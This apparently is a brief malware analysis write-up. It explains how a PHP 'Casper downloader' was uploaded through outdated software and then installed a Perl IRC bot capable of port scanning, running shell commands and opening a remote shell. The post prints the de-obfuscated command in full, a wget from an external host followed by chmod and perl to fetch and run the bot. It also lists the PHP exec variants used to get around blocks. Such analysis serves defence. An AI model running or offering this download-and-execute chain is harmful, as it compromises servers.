This specific customer had some outdated software that allowed the users to upload arbitrary files. The fraudster used that script to upload PHP script on his website and got control over the website. After that, this PHP script downloaded IRC bot written in Perl and from now on the server can receive commands from some IRC server.
We called this PHP script as Casper downloader because of the word "Capsper" appeared in one of the first line in the file.
Here is a code of this PHP downloader:
As you can see in the print screen the script executes a number of cryptic shell commands. After de-obfuscation, it runs the following command:
wget http://www.m-crystal.kz/backup/sb.txt -O sess_sd54t4fg85gdgh58; chmod 755 sess_sd54t4fg85gdgh58; perl sess_sd54t4fg85gdgh58*
Here is how it works:
- Download txt file from http://www.m-crystal.kz/backup/sb.txt .
- Rename the file to sess_sd54t4fg85gdgh58
- Add executable permission to the above file
- Execute the script using the perl: perl sess_sd54t4fg85gdgh58
This shell commands are executed using number of PHP exec() function variations (it is done in case one of the PHP commands is blocked). Instead of exec() the following commands were also used: shell_exec(), system(), passthru().
The above txt file is basically Perl IRC bot. This bot has a number of built in commands. For example it can perform port scan. It is done using the following Perl code
In addition this IRC bot can execute shell commands and return the results to the channel operator and open remote shell on the server.